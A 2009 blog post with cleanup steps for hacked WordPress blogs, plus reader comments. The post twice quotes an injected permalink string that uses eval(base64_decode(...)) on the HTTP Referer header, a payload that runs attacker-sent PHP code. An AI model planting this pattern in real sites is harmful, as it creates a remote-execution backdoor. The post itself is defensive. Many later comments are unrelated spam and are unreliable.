URGENT: If Your WordPress Blog is Acting Strangely, Follow These Steps

4/09/2009

I checked my blog and the URLs looked malformed, with the following structure: http://www.whoisandrewwee.com/2009/09/03/unlocking-unconventional-traffic-sources-for-affiliate-campaigns/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/#comment-506929

If you notice something similar or weird with your WordPress blog, you might want to take the following steps:

Check the “users” tab from the WP admin interface
Remove any unfamiliar users, esp those marked as “administrator”
To prevent users from registering, I’d go as far as to remove wp-register.php (keep a backup and FTP it back in if you have problems)
Check all of WordPress’ PHP scripts, remove global “execute” privileges

Once you’ve secured the perimeter, look at the “Settings” and “permalinks” tab.

If you see some weird stuff like “%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/#comment-506929”, you’d want to clear that, and replace it with your original permalink structure, or look it up on the WordPress codex.

You can also check out this other blog post for more details.

Note: this issue seems to be affecting WordPress 2.6.x. Not sure to what extent it’s affecting version 2.8.x.

UPDATE: Matt Mullenweg from the WordPress development team has posted about the security issues if you’re using an older version of WordPress. Here’s a WP support forum write up about what might be happening.

You might want to upgrade to a newer version of WordPress. Just take note that some of your plugins/themes might not work if the developer hasn’t updated the plugin for compliance with the newest version.

Zemanta

35 comments on URGENT: If Your WordPress Blog is Acting Strangely, Follow These Steps

BrianB
September 5, 2009 at 3:22 am (15 years ago)

We got it, too. Is this a world wide problem? I googled the change script and it seems a few similar problems have popped out recently.
Andrea_R
September 5, 2009 at 4:00 am (15 years ago)

Thanks for this post – we’ve seen it three times today, not sure what versions were running.
mougela
September 5, 2009 at 4:35 am (15 years ago)

Thank you, it helped me tonight !! 🙂
Mr Woc
September 5, 2009 at 5:09 am (15 years ago)

Hi there

Many thanks for this information, I was at my wits end trying to resolve this lol, I think mine occured because of installing the seo plugin pack, but doing what you said on this post worked fine !

Woc
Edward Mills
September 5, 2009 at 5:37 am (15 years ago)

They got me. Thanks for the info on how to clean it up. Wasn’t as cut and dried as you made it sound… had some trouble with my htaccess file. But it’s all good now!
KirstyM
September 5, 2009 at 6:12 am (15 years ago)

Thanks so much Andrew, my blog was also similarly affected and I’ve followed your instructions to fix the issue. I’d have been completely stumped without this post.

Wonder if they’re targeting online marketers, the rotters?!
KirstyM
September 5, 2009 at 7:20 am (15 years ago)

Andrew – a colleague also affected has just told me that most people affected will also have had a new admin inserted directly into their SQL database that doesn’t show up in WordPress interface.

I found this had been placed into my SQL db, it has obviously been stored for later foul internet deeds to be performed…
Andrew Wee
September 5, 2009 at 8:49 am (15 years ago)

Hi Kirsty,
Thanks for that. I’ll drop a note to my server admin.

For those who’re using fantastico/cPanel, it should be an easy fix from the “mySQL database” or “phpMyAdmin” consoles.
Luke Rumley
September 5, 2009 at 1:28 pm (15 years ago)

Lots more going on beneath the surface! Permalinks and hidden admin users! This blog post worked for me to clean house: http://blog.nachotech.com/?p=125

I also renamed my xmlrpc.php and wp-register.php files as a stop-gap solution. It seems 2.8.4 blogs are safe so far. I am guessing 2.8.5 will be out ASAP to correct this is 2.8.4 doesn’t.
Melayu
September 5, 2009 at 1:43 pm (15 years ago)

This post is very good for me.. i can get many tips and trick on this blog.. thank’s for u’r information my friend! this is my first time to visiting to your blog..
Machja
January 5, 2010 at 5:26 am (14 years ago)

Thanks for your post! I just had the problem. 🙁
Dire
May 26, 2010 at 6:37 am (14 years ago)

Thanx a lot! Really works!
Erik
March 10, 2011 at 3:51 am (13 years ago)

This helps! Thank you! I was trying to figure out these problems the other day!
doudoututu
September 9, 2011 at 8:07 pm (13 years ago)

I just could not depart your web website before suggesting that I really enjoyed the usual information a person offer on your visitors? Is going to be back continuously to check out new posts.
jDxOeU
January 5, 2013 at 8:20 am (11 years ago)

wyXfmbFltkZ Isabel Marant Boots wgWfheLqdiT Isabel Marant Sneakers wrLqgbFmfgY http://www.isabelmarantbootsneakersz.com/
wtZwblZmusV Hyperfuse 2012 wlMfdtUickH Nike Hyperdunk 2012 wdLyktLtsdX http://hyperdunk2012.weebly.com/
wcXcjxOiklJ Jordans Retro Shoes wjRvobSorbZ New Jordan 2012 Shoes weKbnhRxtpP http://www.cheapjordanshoez.com/
wbThhuDpzfN Jordan 11 wrHoosRelnH Jordan 11 Concord wsJydbWbbcZ http://www.jordan11concordbred.com/
wqJbtqUajdR nike air penny 5 wpFtxnHaqcI air penny 5 wuSgfsRsmpF http://nikeairpenny5.weebly.com/
wfGotlQbvcF nike air penny 5 whBmrjGaqzE penny 5 wkYwzxJeduA http://airpenny5s.com/
wpZbohZfooW isabel marant boots wtDiywHnciX isabel marant sneakers wfEwllNzdpP http://isabelmarantsneakers2012z.weebly.com/
waTsnmObquH Black Foamposites wtHuooKvfsO Foamposites For Sale woMojlLvsyN http://www.cheapfoampositez2013.com/
pokemonxetyrom
March 29, 2014 at 3:22 am (10 years ago)

This helps! Thank you! I was trying to figure out these problems the other day!
Kassie
November 5, 2015 at 9:55 am (8 years ago)

Thanks for sharing your thoughts about blogging.

Regards
baby formula brands
November 6, 2015 at 7:30 pm (8 years ago)

Pretty nice post. I simply stumbled upon your weblog and wanted to mention that I’ve really loved
surfing around your weblog posts. After all I’ll be subscribing in your feed and I am hoping you write again soon!
holywood
November 17, 2015 at 1:19 pm (8 years ago)

Aw, this was an extremely nice post. Taking the time and actual effort to generate a really good article… but what can I say… I
put things off a whole lot and never manage to get nearly anything done.
metu.tv
December 25, 2015 at 9:47 am (8 years ago)

Hi there would you mind letting me know which web host you’re working with?
I’ve loaded your blog in 3 different internet browsers and I must say this blog loads a lot faster
then most. Can you suggest a good web hosting provider at a honest price?
Thanks a lot, I appreciate it!
Yetta
December 27, 2015 at 12:44 am (8 years ago)

I happen to be writing to let you know what a nice experience
my cousin’s girl enjoyed using your blog. She noticed so many details,
which included what it is like to possess a very
effective coaching spirit to get other people with no
trouble have an understanding of a number of extremely tough issues.
You undoubtedly exceeded our expectations. I appreciate you for distributing such practical,
trusted, edifying and in addition easy tips about that topic to Kate.
chaude du Clitoris porno
January 20, 2016 at 1:46 am (8 years ago)

C’est du bonheur de visiter cce poste
security services Of america
January 25, 2016 at 9:45 am (8 years ago)

What’s up to every one, for the reason that I am genuinely eager
of reading this blog’s post to be updated daily. It includes nice information.
Shiela
March 2, 2016 at 5:05 pm (8 years ago)

Can one with no security, no lien and no warranty want to
get a company loan? No, if the customer goes through typical channels.
However when he has none of these, it is a typical circumstance.
There is an escape for the borrower: unsecured company loans!
Right here, you are not required to offer all these lawfully legitimate files.
Rather is it your business need that is taken into consideration for your loan application to be considered.
It goes without saying that a repayment is must. However,
not like other traditional loans. Credit report can take a rear when this merchant
cash loan type of loan is granted.
Examine your house’s curb appeal and make some improvements.

Your homes ought to be attractive enough that house hunters would believe it is
worth purchasing. Do not opt for a sub-par appearance.

Put in the very best accessories and brighten your house.
The point is to make your home stand out. And the best you can do is to
highlight the very best locations of your house.

Both short and long term loans are on the offer. Long term loans are basically for bring out
long-lasting techniques of a company. They are, by nature, buoyed up by not having extremely precise repayment clauses.
Nor are they handicapped by having pay-by-date. Wait till your business sees a significant improvement and then begin paying.
Just do not take all your life. Little companies can take the loans to take care of short-term uses and
pay back whenever there is money enough to pay back.

So if you want a perfect example of exactly what business use viral
marketing, look them up on youtube or just log into your facebook.
Chances are you have actually seen them being
circulated from buddy to pal on Facebook, Twitter and even through
your email.
Good quality advertisements that appear in lots of various genuine estate booklets and a representative that
knows how to get the word out will certainly help speed up the procedure.

It’s likewise useful to inform all of your close friends, family members, and any individual who will listen that you have a great piece of home for sale.

Word of mouth is totally free and a beneficial advertising strategy.

Sending by mail List – Perhaps you wish to share your knowledge in a newsletter.
Start gathering customers and begin sharing! There are lots of excellent company out
there to help you do this. Google Groups and Yahoo
Groups are two popular options internet marketing that are simple to set up and get lots of visitors.

Is your market niche enough? In truth, niche advertising is the only advertising that works wonder in web
marketing. You have to concentrate your market very specifically in order to construct much targeted
potential customers. Much like if you are targeting sport market, which sport are you targeting?
Is it tennis? And even if it is tennis, you must still additionally focus your market,
like female’s tennis and so on.
20. Know Your Consumers: One ought to have an idea about their targeted consumers.
You can conduct marketing research and customer polls for such purposes to establish an item that satisfies the consumer requirements.
Terrance
March 3, 2016 at 4:18 pm (8 years ago)

Incessantemente lembrando que é preciso conseguir a data retirando para bateria do DVR para usá-la no gerador a senhas.
sexe Gratuit
March 6, 2016 at 9:44 pm (8 years ago)

Je peux vous dire que c’est éternellement
dde la joie de venir sur votre blog
salon fryzjerski wroc?aw
March 15, 2016 at 3:59 pm (8 years ago)

Oferujemy pe?en zakres us?ug fryzjerskich, zarówno damskich, jak i m?skich,
stylizacj? oreaz indywidualny dobór fryzur.
Joleen
March 17, 2016 at 12:50 pm (8 years ago)

I am writing to let you know what a notable encounter my
princess obtained using your webblog. She noticed lots of
details, most notably what it’s like to possess an incredible teaching
style to have other folks without problems master specific extremely tough subject matter.
You really exceeded her expectations. Thank you for distributing
these warm and friendly, trusted, educational as well as easy thoughts
on the topic to Jane.
kancelaria prawna lexus lublin
March 18, 2016 at 8:21 am (8 years ago)

Oferujemy Pa?stwu porady prawne z zakresu prawa handlowego, cywilnego, rodzinnego.
adware review
April 21, 2016 at 9:54 am (8 years ago)

Any business related issues is resolved by the customer support tram immediately on a call,
email or online chat. Therefore, there’sa great chance
that you might have downloaded a file which also triggered an adware download.
Hack tthe registry and manually remove invvalid entries.
?n?m lim xanh giá bán
November 1, 2016 at 8:48 pm (7 years ago)

Your style is unique in comparison to other people I’ve read stuff from.
Thank you for posting when you have the opportunity, Guess I will just bookmark this site.